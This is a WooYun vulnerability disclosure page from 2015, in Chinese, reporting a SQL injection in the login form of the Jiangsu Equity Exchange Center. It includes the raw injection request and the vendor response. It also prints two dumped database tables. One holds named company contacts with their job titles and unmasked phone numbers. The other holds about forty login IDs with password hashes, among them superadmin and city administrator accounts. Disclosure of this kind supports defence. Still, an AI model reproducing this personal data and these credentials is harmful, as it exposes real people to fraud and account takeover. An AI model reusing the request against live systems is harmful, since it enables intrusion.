当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143192

漏洞标题:金融安全之江苏股权交易中心SQL注入(涉及管理员账号/336家公司基金信息)

相关厂商:江苏股权交易中心

漏洞作者: 深度安全实验室

提交时间:2015-09-24 15:32

修复时间:2015-11-13 09:40

公开时间:2015-11-13 09:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开

简要描述:

详细说明:

江苏股权交易中心 如下链接存在SQL注入,其中,loginId参数有问题

POST /jsba/access.login.d HTTP/1.1
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**:80/
Cookie: clientlanguage=zh_CN; JSESSIONID=F70D007148C21E120DC1976ADD1CA158; _error_remaining=1; JSESSIONID=70D7C1C8186E0E5556BF9488AEC5827C
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
login=%e7%99%bb%e5%bd%95&loginId=1&passwordOne=g00dPa%24%24w0rD

1.jpg

漏洞证明:

涉及21个库

2.jpg


以JS_SSBA库为例,涉及35个表

3.jpg

修复方案:

336家公司基金信息、40多个客户账户信息泄露

4.jpg


336家公司基金信息泄露

Database: JS_SSBA
Table: T_ENTERPRISE
[59 entries]
+-----------+----------+-------------------+------------+------------+----------------------------+
| BANK_CD   | LXR_NAME | LXR_PHONE         | QYMC       | LXR_ZW     | EMAIL                      |
+-----------+----------+-------------------+------------+------------+----------------------------+
| 321284001 | 吴江渝      | 15251695522       |            | 副总裁、董事会秘书  | wujiangyu@china_**.**.**.** |
| 321284002 | 薛梁       | 18605239585       |            | 董事会秘书助理    | ronglian@**.**.**.**        |
| 321284003 | 史雅儒      | 13812393535       | 江苏江山制药有限公司 | 投资发展总监     | syr@**.**.**.**           |
| 321284004 | 叶海滨      | 15952632999       |            | 副总经理       | NULL                       |
| 321284005 | 高永兴      | 13337797586       |            | 办公室主任      | cwb@**.**.**.**          |
| 321284006 | 李正球      | 13952625101       |            | 副总经理       | lzq@**.**.**.**            |
| 321284007 | 陆卫明      | 15651161102       |            | 办公室主任      | Lu1125@**.**.**.**         |                 |
| 321284021 | 戴日全      | 13705264569       |            | 总经理        | nhd@**.**.**.**           |
| 321284024 | 计建康      | 13961055369       | 江苏兴海特钢有限公司 | 副总经理       | 13961055369@**.**.**.**        |
| 321284026 | 凌小忠      | 13901430288       | 江苏罡阳股份有限公司 | 财务总监       | 334263248@QQ.COM           |
| 320125003 | 任为荣      | 13585199777       |            | 董秘         | NULL                       |
| 320125004 | 王玉红      | 025-84950885      | 南京宝色股份有限公司 | NULL       | NULL                       |
| 320125005 | 费翔       | 13851691565       |            | NULL       | NULL                       |
| 320125008 | 倪萍       | 025-83751888      |            | NULL       | NULL                       |
| 320125009 | 贾如       | 025-82216299      |            | NULL       | NULL                       |
| 320125010 | 彭娜       | 025-82227888-8181 | 德讯科技股份有限公司 | NULL       | NULL                       |
| 320125011 | 祝青       | 025-68553210      |            | NULL       | NULL                       |
| 320125012 | 林春华      | 025-52168888      | 南京多伦科技有限公司 | NULL       | NULL                       |
| 320125013 | 沈卫宏      | 13701461915       | 南京寒锐钴业有限公司 | NULL       | NULL                       |
| 320125014 | 刘万建      | 025-83291779      |            | NULL       | NULL                       |
| 320125015 | 汪诗弢      | 13951081122       |            | NULL       | NULL                       |
| 320125002 | 潘文兵      | 52785961          |            | 董秘         | NULL                       |
| 320382006 | 唐献东      | 18914895808       |            | 财务部部长      | txdong2008@**.**.**.**         |
| 320382009 | 江文伟      | 13905219566       | 江苏徐航科技有限公司 | 董事会秘书      | jiangwenwei@**.**.**.**      |
| 320382010 | 鲍嘉海      | 13905215780       |            | 财务总监       | xzzb001@**.**.**.**            |
| 321284020 | 柯春华      | 15152697252       | 江苏申源特钢有限公司 | 企管部主管      | sytg-kch@**.**.**.**           |
| 320585046 | 张海东      | 13812923756       |            | 董事会秘书      | zhanghaidong@**.**.**.**    |
| 321284023 | 徐开昌      | 13601477698       |            | 副总经理       | xukaichang@**.**.**.**         |
| 321284025 | 徐开峰      | 13921719688       |            | 总经理助理      | Xukaifeng78@**.**.**.**       |                    |
| 320585047 | 金卫勤      | 15250151233       |            | 董事会秘书      | Portl@**.**.**.**      |                     |
| 320585058 | 顾红军      | 13951130695       |            | 董事会秘书      | NULL                       |
| 320585059 | 王莉萍      | 13567370855       |            | 财务总监       | 385121950@**.**.**.**           |
| 320585060 | 吴疆       | 13962460527       |            | 董事会秘书      | thoughter@**.**.**.**          |
| 320585061 | 贾银铠      | 18913603600       |            | 董秘         | jack.jia@**.**.**.**     |
| 320585009 | 张建初      | 18962259381       |            | 董事会秘书      | zhangjianchu@**.**.**.**   |
| 320585010 | 钟雪冰      | 13812820223       |            | 副总经理兼董事会秘书 | stock@**.**.**.**          |
| 320585011 | 徐慧春      | 13701571087       |            | 董事会秘书、董事   | jscsxhc@**.**.**.**           |
| 320585014 | 汪进       | 13732618815       |            | 秘书         | wangjin@**.**.**.**      |
| 320585015 | 李小杨      | 13656226609       |            | 董秘助理       | dongmi@**.**.**.**      |
| 320585017 | 周予蘅      | 13306260090       | 江苏AB集团股份公司 | 董事会秘书      | zqb@**.**.**.**            |
| 320585018 | 刘玮       | 15895466455       | 昆山华恒焊接股份公司 | 职员         | liuwei@**.**.**.**     |
| 320585019 | 兰永长      | 18962631090       |            | 董事会秘书      | lyc@**.**.**.**          |
+-----------+----------+-------------------+------------+------------+----------------------------+


40多个客户账号、密码、银行卡号等敏感泄露

Database: JS_SSBA
Table: CIUSER
[40 entries]
+------------+----------------------+----------------------------------+-----------+------------+
| USER_ID    | LOGIN_ID             | PASSWD1                          | BANK_CD   | USER_NAME  |
+------------+----------------------+----------------------------------+-----------+------------+
| 320500003  | cs                   | 04E33284235F246B1B9D7827A2986E3F | 320500000 | cs         |
| 320500004  | tc                   | A940A511E3A2B8BCDA83D202D6EC8E4B | 320500000 | tc         |
| 320500005  | ks                   | 9BC930C30BAEDE02F7F54C2105644D04 | 320500000 | ks         |
| 320500009  | gs                   | 54782F23118EB0E3AD9020D04433B8D9 | 320500000 | gs         |
| 320000016  | duanll               | 9C8FFD6FCFC4139536F91345356A4CCE | 320000001 | 金农科技部      |
| 9999999999 | superadmin           | 59088996DCB9A90F6E7D5C05D57B03C7 | 320000001 | SuperAdmin |
| 320000001  | lyx                  | BC0D69B8806BEA050FFC3193E6E21970 | 320000001 | 廖寅宵        |
| 320000002  | nanjing              | 8A25076BCCFEF8472C8063B02B648E84 | 320100000 | 南京市管理员     |
| 320000003  | suzhou               | 8698480F28DEA16A6A1FA7BB75F160C9 | 320500000 | 苏州市管理员     |
| 320000004  | wuxi                 | 785E5609EBAA2F23A932A630E3584D5A | 320200000 | 无锡市管理员     |
| 320000005  | jsjrb                | 5028A7CC8DC36359125C19E85A77CE4D | 320000000 | 省金融办       |
| 320000006  | xuzhou               | 7ADAB4402EBA58E04ECBFF234F5162EF | 320300000 | 徐州市管理员     |
| 320000009  | lianyungang          | F6B28A3263E8427415A5FD5A573C6811 | 320700000 | 连云港市管理员    |
| 320000010  | huaian               | 3ADB845B08375A314D6495763D542F03 | 320800000 | 淮安市管理员     |
| 320000011  | yancheng             | CB152C3C35EFDD31C264E82734D78B73 | 320900000 | 盐城市管理员     |
| 320000013  | zhenjiang            | 6EA01FC1A0748698B6C0DC419A479481 | 321100000 | 镇江市管理员     |
| 320000007  | changzhou            | 9C7D9FD77673A5BCCA722BF9AF6527E7 | 320400000 | 常州市管理员     |
| 320000008  | nantong              | E88DCA43F64B659CE9AC50697B47A512 | 320600000 | 南通市管理员     |
| 320000012  | yangzhou             | 6FA594939D53A0C80E9079FD9DB95893 | 321000000 | 扬州市管理员     |
| 320000014  | taizhou              | E7D66494265CC304DFEC4FE40A33F062 | 321200000 | 泰州市管理员     |
| 320000015  | suqian               | 113DF31D7C1B74FD23CDC278D5E108F6 | 321300000 | 宿迁市管理员     |
| 320300001  | wuanjun              | ACD23FFE083B2CC23D875907364B76F5 | 320300000 | 伍安军        |
| 320300002  | shengjie             | B7D01B7C9205CA032E9B9F5F7B851869 | 320300000 | 盛洁         |
| 321100001  | danyang              | 9B5C616C363BF8FD3DB58BBB4769EE2F | 321100000 | danyang    |
| 321100002  | NULL                 | E6DCB1E56C7BD01828E9DE57B9C96A2F | 321100000 | danyang    |
| 321100003  | xinqu                | 657C34B1BFB99F11B2D989E857885FA7 | 321100000 | xinqu      |
| 320500001  | suzhoutest           | 4D31427D23674007BBDFB056F9E21CC4 | 320500000 | suzhoutest |
| 321100004  | jurong               | DD6BEBF5C1609557AD710C43E4DC1550 | 321100000 | jurong     |
| 321100005  | yangzhong            | D7D5BECE5D37E0DDD4D7F941DCF5D3B9 | 321100000 | yangzhong  |
| 321100008  | dantu                | 5F5BC16A19F0FC8DC3DDC48A5C116913 | 321100000 | dantu      |
| 321100006  | jingkou              | DFDB612A6ED635286C668E79F06C6E45 | 321100000 | jingkou    |
| 321100007  | runzhou              | 210280B9BFE7B317EE320A70D3AE2207 | 321100000 | runzhou    |
| 320500002  | zjg                  | A87EA9D433A425D61A5EB9D09A8EE1AC | 320500000 | zjg        |
| 320500008  | xc                   | 4C0797F7C9C89922C91B688EADFFC523 | 320500000 | xc         |
| 320500010  | gxq                  | 8EB18AA560F52619E61C12A5E6A74634 | 320500000 | gxq        |
| 320000017  | jobtest              | CB9008C612D8084BEFA588AFDA930767 | 320000001 | 业务测试       |
| 320500006  | wj                   | 7AE931530360A564A200BE7E603B06E8 | 320500000 | wj         |
| 320500007  | wz                   | 2CB106CDADCE76CDC298A546848351DE | 320500000 | wz         |
| 320500011  | gyyq                 | A50FFD3712A5D0875669F30C59893335 | 320500000 | gyyq       |
| 321000001  | ljj                  | 9D6D70E99E64DA1B37F75DDB91F65444 | 321000000 |            |
+------------+----------------------+----------------------------------+-----------+------------+

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-29 09:38

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评论